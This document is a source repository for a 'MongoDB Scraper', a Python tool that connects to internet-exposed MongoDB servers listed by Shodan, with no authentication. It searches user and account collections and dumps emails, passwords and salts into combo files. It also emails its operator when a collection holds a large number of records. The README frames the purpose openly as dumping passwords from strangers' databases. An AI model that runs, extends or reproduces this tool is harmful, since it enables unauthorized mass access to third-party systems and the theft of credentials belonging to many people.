├── .gitignore
├── README.md
├── mongodb-scraper.py
├── parse_data.py
└── settings-dist.json


/.gitignore:
--------------------------------------------------------------------------------
 1 | .idea
 2 | data
 3 | data_orig.json
 4 | ip.py
 5 | mongodb-scraper.log*
 6 | data.json
 7 | data_raw.json
 8 | processed.json
 9 | passwords*.txt
10 | combo*.txt
11 | settings.json


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # MongoDB Scraper
 2 | 
 3 | So accordingly to Shodan, there are more than 30k Mongodb instances publicly available, running on the standard port. Many of them are running with default settings (ie no authentication required).
 4 | 
 5 | What if we start scraping them all and dump the passwords?
 6 | 
 7 | ### Requirements
 8 | ```
 9 | pip install pymongo
10 | pip install colorlog
11 | ```
12 | 
13 | ### Usage
14 | First of all create a `data.json` file, including a JSON encoded array of IPs:
15 | ```
16 | ["123.456.789", "987.654.321"]
17 | ```
18 | If you have downloaded a report from Shodan, you can easily parse it using the script file `parse_data.py`.  
19 | Then simply run the scraper using the following command:
20 | ```
21 | python mongodb-scaper.py
22 | ```
23 | 
24 | You can supply a comma separate list of IPs as an additional argument `--skip` to manually check some IPs as processed and thus exlude them from the stack
25 | ```
26 | python mongodb-scraper.py --skip "123.123.123,123.456.789"
27 | ```
28 | 
29 | ### Get alerts on juicy results
30 | If you want to get an email when you find some BIG DUMP (default when there are more than 1M of rows), simply copy the `settings-dist.json` file and rename it to `settings.json`, filling all the fields.
31 | 


--------------------------------------------------------------------------------
/mongodb-scraper.py:
--------------------------------------------------------------------------------
  1 | # coding=utf-8
  2 | import argparse
  3 | import logging
  4 | import logging.handlers
  5 | import json
  6 | import re
  7 | from colorlog import ColoredFormatter
  8 | from pymongo import MongoClient
  9 | from pymongo import errors as mongo_errors
 10 | import io
 11 | import os
 12 | import smtplib
 13 | from email.mime.text import MIMEText
 14 | 
 15 | 
 16 | class MongodbScraper:
 17 |     def __init__(self):
 18 |         # Init class variables
 19 |         self.settings = {}
 20 |         self.ips = []
 21 |         self.processed = []
 22 |         self.table_names = ['account', 'user', 'subscriber', 'customer']
 23 |         self.column_names = ['pass', 'pwd']
 24 |         self.email_regex = re.compile(r'[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}')
 25 |         self.filename = 'combo.txt'
 26 | 
 27 |         # Init the logger
 28 |         self.logger = logging.getLogger('mongodb-scraper')
 29 |         self.logger.setLevel(logging.DEBUG)
 30 | 
 31 |         # Create a rotation logging, so we won't have and endless file
 32 |         rotate = logging.handlers.RotatingFileHandler(
 33 |                         'mongodb-scraper.log', maxBytes=(5 * 1024 * 1024), backupCount=3)
 34 |         rotate.setLevel(logging.DEBUG)
 35 |         formatter = logging.Formatter('%(asctime)s|%(levelname)-8s| %(message)s')
 36 |         rotate.setFormatter(formatter)
 37 | 
 38 |         self.logger.addHandler(rotate)
 39 | 
 40 |         console = logging.StreamHandler()
 41 |         console.setLevel(logging.INFO)
 42 | 
 43 |         formatter = ColoredFormatter("%(log_color)s%(asctime)s|[%(levelname)-4s] %(message)s%(reset)s", "%H:%M:%S")
 44 |         console.setFormatter(formatter)
 45 |         self.logger.addHandler(console)
 46 | 
 47 |         # Check that the data dir exists
 48 |         if not os.path.exists('data'):
 49 |             os.makedirs('data')
 50 | 
 51 |         # Load previous data
 52 |         self._load_data()
 53 | 
 54 |         # Let's parse some CLI options
 55 |         parser = argparse.ArgumentParser()
 56 |         parser.add_argument('-s', '--skip', help='Supply a comma separated string of IPs that should be skipped')
 57 | 
 58 |         arguments = parser.parse_args()
 59 | 
 60 |         if arguments.skip:
 61 |             skip = arguments.skip.split(',')
 62 |             self.processed += skip
 63 | 
 64 |         # Load settings
 65 |         self._load_settings()
 66 | 
 67 |     def _load_data(self):
 68 |         self.logger.info("Opening data")
 69 | 
 70 |         try:
 71 |             with open('data.json', 'r') as data_json:
 72 |                 self.ips = json.load(data_json)
 73 |         except (IOError, ValueError):
 74 |             raise RuntimeError("Please provide a valid JSON encoded file in data.json")
 75 | 
 76 |         self.logger.info("Found " + str(len(self.ips)) + " IPs to connect")
 77 | 
 78 |         try:
 79 |             with open('processed.json', 'r') as processed_json:
 80 |                 self.processed = json.load(processed_json)
 81 |         except (IOError, ValueError):
 82 |             # Meh, I'll live with that...
 83 |             pass
 84 | 
 85 |         if self.processed:
 86 |             self.logger.info("Found " + str(len(self.processed)) + " already processed IP")
 87 | 
 88 |     def _load_settings(self):
 89 |         try:
 90 |             with open('settings.json', 'r') as settings_json:
 91 |                 self.settings = json.load(settings_json)
 92 | 
 93 |             self.logger.info("Settings file found")
 94 |         except (IOError, ValueError):
 95 |             self.logger.info("Settings file not found")
 96 | 
 97 |     def _notify(self, ip, collection, count):
 98 |         try:
 99 |             threshold = self.settings['email']['threshold']
100 |         except KeyError:
101 |             # No key set
102 |             return
103 | 
104 |         # Result is not interesting enough
105 |         if count < threshold:
106 |             return
107 | 
108 |         # Do I have all the required strings?
109 |         try:
110 |             email_from = self.settings['email']['from']
111 |             email_to = self.settings['email']['to']
112 |             host = self.settings['email']['smtp']['host']
113 |             port = self.settings['email']['smtp']['port']
114 |             user = self.settings['email']['smtp']['user']
115 |             password = self.settings['email']['smtp']['password']
116 |         except KeyError:
117 |             return
118 | 
119 |         # Ok, but are they really set?
120 |         if not all([email_from, email_to, host, port, user, password]):
121 |             return
122 | 
123 |         # Ok, we're good to go
124 |         body = """
125 | Hi Dude!
126 | I have just found a juicy collection!
127 | 
128 | IP: {0}
129 | Collection: {1}
130 | Rows: {2}
131 | """
132 |         body = body.format(ip, collection, count)
133 |         mailer = smtplib.SMTP(host, str(port), timeout=10)
134 |         mailer.starttls()
135 |         mailer.login(user=user, password=password)
136 |         message = MIMEText(body)
137 | 
138 |         message['Subject'] = 'Juicy collection at ' + ip
139 |         message['From'] = email_from
140 |         message['To'] = email_to
141 | 
142 |         try:
143 |             mailer.sendmail(email_from, [email_to], message.as_string())
144 |             mailer.quit()
145 |         except smtplib.SMTPException:
146 |             return
147 | 
148 |     def _check_datafile(self):
149 |         size = 0
150 | 
151 |         if os.path.exists('data/' + self.filename):
152 |             size = os.path.getsize('data/' + self.filename)
153 | 
154 |         # Did the file grow too large?
155 |         if size > (20 * 1024 * 1024):
156 |             i = 0
157 |             while i < 100:
158 |                 i += 1
159 | 
160 |                 combo_file = 'combo_' + str(i) + '.txt'
161 |                 if not os.path.exists('data/' + combo_file):
162 |                     self.filename = combo_file
163 |                     break
164 | 
165 |     def scrape(self):
166 |         for ip in self.ips:
167 |             # Do I have already processed this IP?
168 |             if ip in self.processed:
169 |                 continue
170 | 
171 |             self.logger.info("Connecting to " + ip)
172 | 
173 |             try:
174 |                 client = MongoClient(ip, connectTimeoutMS=5000)
175 |                 dbs = client.database_names()
176 |             except (KeyboardInterrupt, SystemExit):
177 |                 return
178 |             except:
179 |                 self.logger.warning("An error occurred while connecting to " + ip + ". Skipping")
180 |                 # Don't cry if we can't connect to the server
181 |                 self.processed.append(ip)
182 |                 continue
183 | 
184 |             for db in dbs:
185 |                 # Skip local system databases
186 |                 if db in ['admin', 'local']:
187 |                     continue
188 | 
189 |                 self.logger.debug("\t\tAnalyzing db: " + db)
190 | 
191 |                 o_db = client[db]
192 | 
193 |                 try:
194 |                     collections = o_db.collection_names()
195 |                 except (KeyboardInterrupt, SystemExit):
196 |                     return
197 |                 except Exception:
198 |                     # Don't cry if something bad happens
199 |                     self.logger.warning("\tAn error occurred while fetching collections from " + ip + ". Skipping.")
200 |                     break
201 | 
202 |                 for collection in collections:
203 |                     if collection in ['system.indexes']:
204 |                         continue
205 | 
206 |                     self.logger.debug("\t\tAnalyzing collection: " + collection)
207 |                     # Is this a collection I'm interested into?
208 |                     if not any(table in collection for table in self.table_names):
209 |                         continue
210 | 
211 |                     o_coll = o_db[collection]
212 | 
213 |                     try:
214 |                         row = o_coll.find_one()
215 |                     except:
216 |                         # Sometimes the collection is broken, let's skip it
217 |                         continue
218 | 
219 |                     interesting = False
220 | 
221 |                     # If the collection is empty I get a null row
222 |                     if row:
223 |                         for key, value in row.iteritems():
224 |                             # Is that a column we're interested into?
225 |                             if any(column in key for column in self.column_names):
226 |                                 # Only consider plain strings, nothing fancy
227 |                                 if isinstance(value, basestring):
228 |                                     interesting = True
229 |                                     break
230 | 
231 |                     # This collection has no interesting data? Let's skip it
232 |                     if not interesting:
233 |                         continue
234 | 
235 |                     self.logger.info("** Table with interesting data found")
236 | 
237 |                     # Check if the current data file is too large
238 |                     self._check_datafile()
239 | 
240 |                     # Ok there is interesting data inside it. Let's find if there is an email address, too
241 |                     # I'll just check the first record and hope there is something similar to an email address.
242 |                     email_field = ''
243 |                     salt_field = ''
244 | 
245 |                     for key, value in row.iteritems():
246 |                         # If we find anything that resemble an email address, let's store it
247 |                         if isinstance(value, basestring):
248 |                             try:
249 |                                 if re.match(self.email_regex, value.encode('utf-8')):
250 |                                     email_field = key
251 | 
252 |                                 if 'salt' in key.lower():
253 |                                     salt_field = key
254 |                             except UnicodeDecodeError:
255 |                                 pass
256 | 
257 |                     rows = o_coll.find(batch_size=500).max_time_ms(10000)
258 |                     total = rows.count()
259 | 
260 |                     if total > 750:
261 |                         self.logger.info("***FOUND COLLECTION WITH  " + '{:,}'.format(total) + "  RECORDS. JUICY!!")
262 | 
263 |                     self._notify(ip, collection, total)
264 | 
265 |                     lines = []
266 |                     counter = 0
267 | 
268 |                     try:
269 |                         for row in rows:
270 |                             counter += 1
271 |                             try:
272 |                                 email = row[email_field].encode('utf-8')
273 |                                 if not email:
274 |                                     email = ''
275 |                             except:
276 |                                 email = ''
277 | 
278 |                             # Try to fetch the salt, if any
279 |                             try:
280 |                                 salt = row[salt_field].encode('utf-8')
281 |                                 if not salt:
282 |                                     salt = ''
283 |                             except:
284 |                                 salt = ''
285 | 
286 |                             for key, value in row.iteritems():
287 |                                 try:
288 |                                     # Skip fields marked as emails / salt
289 |                                     if key in [email_field, salt_field]:
290 |                                         continue
291 | 
292 |                                     # Is that a column we're interested into?
293 |                                     if any(column in key for column in self.column_names):
294 |                                         # Skip empty values
295 |                                         if not value:
296 |                                             continue
297 | 
298 |                                         # Skip fields that are not strings (ie reset_pass_date => datetime object)
299 |                                         if not isinstance(value, basestring):
300 |                                             continue
301 | 
302 |                                         value = value.encode('utf-8') + ':' + salt
303 | 
304 |                                         lines.append(unicode(ip.encode('utf-8') + '|' + email + ':' + value + '\n'))
305 |                                 except UnicodeDecodeError:
306 |                                     # You know what? I'm done dealing with all those crazy encodings
307 |                                     self.logger.warn("An error occurred while encoding the string. Skipping")
308 |                                     continue
309 | 
310 |                             # If I get a very long list, let's write it in batches
311 |                             if len(lines) >= 1000:
312 |                                 self.logger.info("\t\tWriting " + '{:,}'.format(counter) + "/" + '{:,}'.format(total) + " records")
313 |                                 with io.open('data/' + self.filename, 'a', encoding='utf-8') as fp_pass:
314 |                                     fp_pass.writelines(lines)
315 |                                     lines = []
316 |                     except mongo_errors.ExecutionTimeout:
317 |                         self.logger.warning("Cursor timed out, skipping")
318 |                     except mongo_errors.BSONError:
319 |                         self.logger.warning("Error while fetching cursor data, skipping")
320 |                     except KeyError:
321 |                         self.logger.warning("Manually skipping recordset")
322 |                     except:
323 |                         self.logger.warning("A generic error occurred while iterating over the cursors. Skipping")
324 | 
325 |                     with io.open('data/' + self.filename, 'a', encoding='utf-8') as fp_pass:
326 |                         fp_pass.writelines(lines)
327 | 
328 |             client.close()
329 |             self.processed.append(ip)
330 | 
331 |             with open('processed.json', 'w') as processed_json:
332 |                 json.dump(self.processed, processed_json)
333 | 
334 | 
335 | if __name__ == '__main__':
336 |     scraper = MongodbScraper()
337 |     scraper.scrape()
338 | 
339 | 


--------------------------------------------------------------------------------
/parse_data.py:
--------------------------------------------------------------------------------
 1 | import json
 2 | 
 3 | ret = []
 4 | 
 5 | with open('data_raw.json', 'r') as f:
 6 |     for line in f:
 7 |         parser = json.loads(line)
 8 |         ret.append(parser.get('ip_str'))
 9 | 
10 | with open('data.json', 'w') as f:
11 |     json.dump(ret, f)
12 | 


--------------------------------------------------------------------------------
/settings-dist.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "email" : {
 3 |     "threshold" : 1000000,
 4 |     "from" : "",
 5 |     "to" : "",
 6 |     "smtp" : {
 7 |       "host" : "",
 8 |       "port" : "",
 9 |       "user" : "",
10 |       "password" : ""
11 |     }
12 |   }
13 | }


--------------------------------------------------------------------------------